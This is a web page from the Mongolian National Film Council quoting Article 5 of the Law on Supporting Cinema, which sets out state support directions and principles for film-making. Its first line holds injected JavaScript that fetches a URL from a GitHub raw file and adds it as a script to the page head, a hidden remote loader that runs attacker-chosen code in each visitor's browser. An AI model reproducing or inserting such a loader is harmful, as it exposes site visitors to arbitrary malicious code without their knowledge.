;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Тэргүүлэх чиглэл - Mongolian National Film Council

Тэргүүлэх чиглэл

Кино урлагийг дэмжих тухай хууль нь Кино үйлдвэрлэх үйл ажиллагааны эрх зүйн үндсийг бүрдүүлж, Монгол Улсад кино бүтээх таатай орчныг бий болгох, кино урлагийг хөгжүүлэхэд төрөөс дэмжлэг үзүүлэхтэй холбогдсон харилцааг зохицуулахад оршино.

5 дугаар зүйл.Кино урлагийг дэмжих чиглэл, зарчим

5.1.Төрөөс кино урлагийг дэмжихэд дараах чиглэл баримтална:

5.1.1.уран бүтээлчийн хөгжлийг дэмжих, дотоод, гадаадад сургах, мэргэшүүлэх;

5.1.2.кино үйлдвэрлэлд шаардагдах дэд бүтцийг бий болгох, техник технологийг сайжруулахад хөрөнгө оруулалт, татвар, санхүү болон бусад хэлбэрээр дэмжлэг үзүүлэх;

5.1.3.кино урлагийн салбарт оруулах дотоод, гадаадын хөрөнгө оруулалтыг нэмэгдүүлэх.

5.2.Кино урлагийг дэмжихэд дараах зарчим баримтална:

5.2.1.ил тод, шударга, тэгш өрсөлдөх боломжтой байх;

5.2.2.хялбаршуулсан зохицуулалт бүхий, хэрэгжихүйц, тодорхой байх;

5.2.3.уран бүтээлчийн үзэл бодлоо чөлөөтэй илэрхийлэх эрхийг нь хязгаарлахгүй байх.